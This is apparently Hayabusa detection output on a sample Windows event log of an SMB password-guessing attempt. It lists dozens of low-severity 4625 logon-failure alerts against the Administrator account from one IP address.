2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vr1kMRxLEaCIWIbf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4PHEJyKgp5wXRtBk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dbaoz8rTZVXUjRAg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d4eD3JQ5gquIqgND  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U9slFFSSXhFxPqG1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YDb5Up4KwJj0hN5n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DxqIpDLlnf6Xyc34  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rTCTTYmKTIzzJwxH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oD3dLxlB3qWIhZEQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fe9xMOoCxPJIIyVq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DW3YgBZYiGTeEw66  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VAKeeIcOeiQ3H9NF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nmF3ot3gJCsBlSwF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wDjoResfZvvVqqE5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V4dwzMwvVtzztGwr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0qklApBFOMxVzucD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0IJSphtLB3eNARBo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PLOFe4w5KpJ2UaGM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cF3JTWkGadY1fJE2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kyTH0jxSZB2YVdhW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NRq5XrcDkFvabCzh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zlYwlgrsMy1kSgEC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AchwW4ifbZ41AQNg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1PaxF7Q8ue1Kex1h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WAhW2PErXdwNVrx5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LoAV3ESqieev2JMC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wFlWFijaFirgsAtJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hSDjuqvzKLaWCWVo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SL0CVu787iFRLiPU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZQDORN33izpv4tGO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v470yorD43fgGyjC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LBbLWVZFDqFxb7dW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RJsowt9MrhXciLOZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uhCVFyMmDI5shASV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yd4SM9EGM7cnO6Z5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PSR1tbtzdDaJDbXs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rNqyjBuN0Pq6WRO1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vqpMAmE9OvHbFCh2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JfLQAaB0DPvxWQMB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A0kvHMwnj2k0HMLQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kPqfVDftcR4iRDaw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1bltwm2g13InAJM6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J2iFr8ppe5NzukXF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7EEUOBohBFRze6hL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NCOFn3WM71KmaZyB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UdUkBxB1auduRfdS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E2JaWoYK56HRGfW1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a3JTCX9NIOpg6TFB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zFGkdUVAdKcrrREB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7oZW00FpKema01Vw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p4HbNQx0Acf83b1h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j9aM5UCQbOLvcpI0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BGGChEAIdej9lBhr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4CaFYB1ImWAWbH0W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OLa3lkxWiJ00raQh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vMzyi0jIVLNrodC8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n2repX0roAP2j0TI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gqcpIjdkNpmoTe4A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Edgo9UdNvmMJpiyn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LpqOTu7Xn7ULipmN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TP0efL79STMbuu9g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HkwWfRi0E5sVY6UT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IkyCe9NXGExCQS5r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IGnhRwa7P7by9vJO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fh7IGliNbSyKwxpM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1QfgWsAqSYQfB9l5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q8VM66P8Vluf7yrL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cdYiwh3QjdA0Zoge  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ou3FPUI5bFcUvuFC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bMUg8N7apFtUgX9d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U7Cn4n7jQAQaxP6y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: urflPvd1vgYYi2ra  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pqFtTDD69fNTKROG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
